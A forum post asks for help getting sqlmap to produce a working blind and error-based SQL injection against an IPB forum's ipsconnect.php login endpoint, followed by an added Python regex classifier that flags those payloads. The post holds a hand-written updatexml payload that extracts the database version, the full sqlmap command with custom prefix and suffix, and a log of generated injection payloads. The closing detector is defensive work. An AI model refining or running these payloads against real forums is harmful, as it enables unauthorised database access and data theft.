I want to do blind SQL injection on an IPB forum. Doing it by hand works, but it takes far too long, so I tried sqlmap, but I can't get it to produce the right request. It has to be in the following format:
1111) and 0="'" and updatexml(NULL,concat(0x3a, (SELECT @@version) ) ,NULL)-- -'
which executes the SQL query SELECT @@version. updatexml is just an example; other methods are fine too.
sqlmap.py -u "http://example.com/interface/ipsconnect/ipsconnect.php" --data "act=login&idType=id&id[]=1111" --suffix="-- -'" --dbms=mysql -v3 --technique=B --prefix=") and "'" and "" --level 5 --risk 3 -p id[]
But it generates wrong requests, for example:
[09:12:05] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:05] [WARNING] heuristic (basic) test shows that POST parameter 'id[]' might not be injectable
[09:12:05] [PAYLOAD] 1111) and ' and 'BLvfen<'">pylcPB-- -'
[09:12:05] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:05] [INFO] testing for SQL injection on POST parameter 'id[]'
[09:12:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:12:05] [PAYLOAD] 1111) and ' and AND 1732=2317-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] 1111) and ' and AND 5551=5551-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[09:12:06] [PAYLOAD] -2700) and ' and OR 6220=5854-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] -5459) and ' and OR 4862=4862-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[09:12:06] [PAYLOAD] 1111) and ' and OR NOT 4347=4111-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] 1111) and ' and OR NOT 6303=6303-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:12:06] [PAYLOAD] 1111) and ' and AND 7850=(SELECT (CASE WHEN (7850=7860) THEN 7850 ELSE (SELECT 7860 UNION SELECT 1139) END))-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] 1111) and ' and AND 4417=(SELECT (CASE WHEN (4417=4417) THEN 4417 ELSE (SELECT 7307 UNION SELECT 1910) END))-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:12:06] [PAYLOAD] -6639) and ' and OR 4761=(SELECT (CASE WHEN (4761=4384) THEN 4761 ELSE (SELECT 4384 UNION SELECT 4595) END))-- -'
First, the double quotes between the "and" clauses are missing. It also seems strange to me that sqlmap doesn't use any sleep or rlike to extract data, even though I specified the blind technique. I'm not very familiar with sqlmap, so I must be doing something wrong :D My guess is that the double quotes in the prefix are the problem. This is running on a Windows machine. Maybe try it on Linux?
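Every request in the log above came back 403, which means something in front of the application (a WAF or input filter) is rejecting these parameter values before they reach the forum. The following is an added example, not code from the post or from sqlmap, showing what such a pattern-based classifier looks like when run over exactly the payload shapes the log shows. The log excerpt and the hand-written updatexml payload are embedded as constructed sample input; the indicator names and regexes are this example's own. Signature matching like this is easy to evade with alternative syntax, so it is a detection layer, not a substitute for parameterized queries in the application.

```python
import re
from urllib.parse import parse_qs

# Constructed sample input: an excerpt of the sqlmap log lines from the post above.
SAMPLE_LOG = """\
[09:12:05] [PAYLOAD] 1111) and ' and 'BLvfen<'">pylcPB-- -'
[09:12:05] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:05] [PAYLOAD] 1111) and ' and AND 1732=2317-- -'
[09:12:06] [PAYLOAD] -5459) and ' and OR 4862=4862-- -'
[09:12:06] [PAYLOAD] 1111) and ' and OR NOT 4347=4111-- -'
[09:12:06] [PAYLOAD] 1111) and ' and AND 4417=(SELECT (CASE WHEN (4417=4417) THEN 4417 ELSE (SELECT 7307 UNION SELECT 1910) END))-- -'
"""

# Constructed sample input: the hand-written payload the post says works.
HAND_PAYLOAD = r"""1111) and 0="'" and updatexml(NULL,concat(0x3a, (SELECT @@version) ) ,NULL)-- -'"""

# Indicator names and patterns are this example's own (hypothetical), chosen to
# match the shapes visible in the log. SQL keywords are case-insensitive, so the
# keyword patterns use re.I. Order here is the order hits are reported in.
INDICATORS = [
    # closing paren, then a boolean operator, then a stray quote: ") and '"
    ("quote_breakout", re.compile(r"\)\s*(and|or)\s*'", re.I)),
    # "AND 5551=5551", "OR NOT 4347=4111": boolean-based blind probes
    ("boolean_numeric_compare", re.compile(r"\b(AND|OR)\s+(NOT\s+)?(\d+)=(\d+)\b", re.I)),
    # "(SELECT (CASE WHEN ..." subquery probes
    ("select_case_subquery", re.compile(r"\(SELECT\s+\(CASE\s+WHEN", re.I)),
    # MySQL XML functions commonly used for error-based extraction
    ("xml_error_function", re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    # server version probe
    ("version_probe", re.compile(r"@@version", re.I)),
    # trailing MySQL comment terminator such as "-- -'"
    ("comment_terminator", re.compile(r"--\s*-?\s*'?\s*$")),
]


def extract_payloads(log_text):
    """Pull the raw payload strings out of sqlmap's [PAYLOAD] log lines."""
    return [m.group(1) for m in re.finditer(r"\[PAYLOAD\] (.*)$", log_text, re.M)]


def classify(value):
    """Return the names of every indicator that fires on one parameter value, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def scan_body(body):
    """Classify each parameter of a form-encoded POST body.

    Returns {parameter_name: [indicator names]} for flagged parameters only;
    a clean body yields an empty dict.
    """
    flagged = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        hits = [n for n, rx in INDICATORS if any(rx.search(v) for v in values)]
        if hits:
            flagged[name] = hits
    return flagged


if __name__ == "__main__":
    for payload in extract_payloads(SAMPLE_LOG):
        print(classify(payload), "<-", payload)
    print(classify(HAND_PAYLOAD), "<-", HAND_PAYLOAD)
    print(scan_body("act=login&idType=id&id[]=1111"))
```

Run as a script it prints, for each logged payload, which indicators fired; the plain login body from the original sqlmap command ("id[]=1111") produces no hits, and every sqlmap-generated payload trips at least the quote-breakout and comment-terminator patterns, which is consistent with all of them being rejected with 403.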